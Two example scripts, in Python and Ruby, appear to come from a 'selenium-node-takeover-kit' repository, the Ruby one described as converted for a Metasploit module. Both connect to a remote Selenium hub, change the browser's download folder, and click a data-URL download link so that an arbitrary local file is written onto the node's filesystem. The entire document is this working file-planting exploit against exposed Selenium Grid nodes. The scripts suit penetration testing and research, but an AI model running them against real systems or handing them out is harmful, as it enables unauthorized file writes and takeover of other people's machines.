File: examples/selenium_node_upload.py
#!/usr/bin/env python
# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_upload.py
#
# You can upload a file onto a remote selenium node by changing the download folder and clicking a download link.
# Small files can be encoded and used within url inline html. Larger files should be pulled remotely.
# Limits are 1. the context of the process on the selenium node, 2. it cannot overwrite files, and 3. it doesnt seem to be able to make dot files.

import base64, getopt, sys, os
from selenium import webdriver
from selenium.webdriver.remote.file_detector import UselessFileDetector

def get_driver(url, remote_path):
    # To prevent download dialog
    profile = webdriver.FirefoxProfile()
    profile.set_preference('browser.download.folderList', 2) # custom location
    profile.set_preference('browser.download.manager.showWhenStarting', False)
    profile.set_preference('browser.download.dir', remote_path)
    profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'application/octet-stream')

    options = webdriver.FirefoxOptions()
    options.profile = profile

    driver = webdriver.Remote(
            command_executor=url,
            desired_capabilities=options.to_capabilities()
            )
    return driver

def parse_args():
    url_wd, remote_file, local_file, data = None, None, None, None
    myopts, args = getopt.getopt(sys.argv[1:],':r:u:l:d:')
    for o, a in myopts:
        if o == '-u':
            url_wd = a
        elif o == '-r':
            remote_file = a
        elif o == '-l':
            local_file = a
        elif o == '-d':
            #data = str.encode(a)
            data = base64.b64encode(str.encode(a))

    return url_wd, remote_file, local_file, data

if __name__ == '__main__':
    url_wd, remote_file, local_file, data = parse_args()

    # Just overwrite whatever is in data
    if local_file:
        with open(local_file, 'rb') as file:
            data = base64.b64encode(file.read())

    remote_path = os.path.dirname(remote_file)
    remote_basename = os.path.basename(remote_file)

    data_url = 'data:text/html;charset=utf-8,<html><a id=f href="data:application/octet-stream;charset=utf-16le;base64,%s" download="%s">f</a></html>' % ( data.decode('utf-8'), remote_basename )

    driver = get_driver(url_wd, remote_path)
    try:
        driver.get(data_url)
        driver.find_element_by_id('f').click()
    finally:
        driver.quit()
    sys.exit(0)

File: examples/selenium_node_upload.rb
#!/usr/bin/env ruby
# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_upload.rb
#
# You can upload a file onto a remote selenium node by changing the download folder and clicking a download link.
# Small files can be encoded and used within url inline html. Larger files should be pulled remotely.
# Limits are 1. the context of the process on the selenium node, 2. it cannot overwrite files, and 3. it doesnt seem to be able to make dot files.
#
# Converted to Ruby for metasploit module

require 'selenium-webdriver'
require 'base64'
require 'optparse'

options = {}
OptionParser.new do |opts|
  opts.banner = 'Usage: example.rb [options]'
  opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h|
    options[:hub] = h
  end
  opts.on('-rFILE', '--remoteFILE', 'The destination of the uploaded files.') do |r|
    options[:remote] = r
  end
  opts.on('-lFILE', '--localFILE', 'The (small) local to upload.') do |l|
    options[:local] = l
  end
  opts.on('-bBROWSER', '--dataBROWSER', 'firefox or chrome.') do |b|
    options[:browser] = b
  end
  opts.on('--help', 'Prints this help') do
    puts opts
    exit
  end
end.parse!

hub_url = options[:hub]
remote_file = options[:remote]
local_file = options[:local]
browser = options[:browser]

# Inline html with an inline download file link
url_file = 'data:application/octet-stream;charset=utf-16le;base64,%s' % [Base64.encode64( File.read(local_file) )]
data_url = 'data:text/html;charset=utf-8,<html><a id=f href="%s" download="%s">f</a></html>' % [url_file, File::basename(remote_file)]

capabilities = {}
if browser == 'chrome'
  capabilities = Selenium::WebDriver::Remote::Capabilities.chrome(
    "chromeOptions" => {
      'prefs' => {
        'profile.default_content_settings.popups' => 0,
        'download.default_directory' => File::dirname(remote_file),
        'download.prompt_for_download' => false,
      }
    }
  )
else
   # Configure browser profile to use custom download location and not prompt to save files for mime type.
  profile = Selenium::WebDriver::Firefox::Profile.new
  profile['browser.download.folderList'] = 2
  profile['browser.download.manager.showWhenStarting'] = false
  profile['browser.download.dir'] = File::dirname(remote_file)
  profile['browser.helperApps.neverAsk.saveToDisk'] = 'application/octet-stream;'
  capabilities = Selenium::WebDriver::Remote::Capabilities.firefox(:firefox_profile => profile)
end

driver = Selenium::WebDriver.for :remote, :url => hub_url, :desired_capabilities => capabilities

# Load the data URL and click the download link
driver.navigate.to(data_url)
driver.find_element(:id, 'f').click

if browser == 'chrome' # Not sure why this is needed
  sleep(5)
end
driver.quit

exit
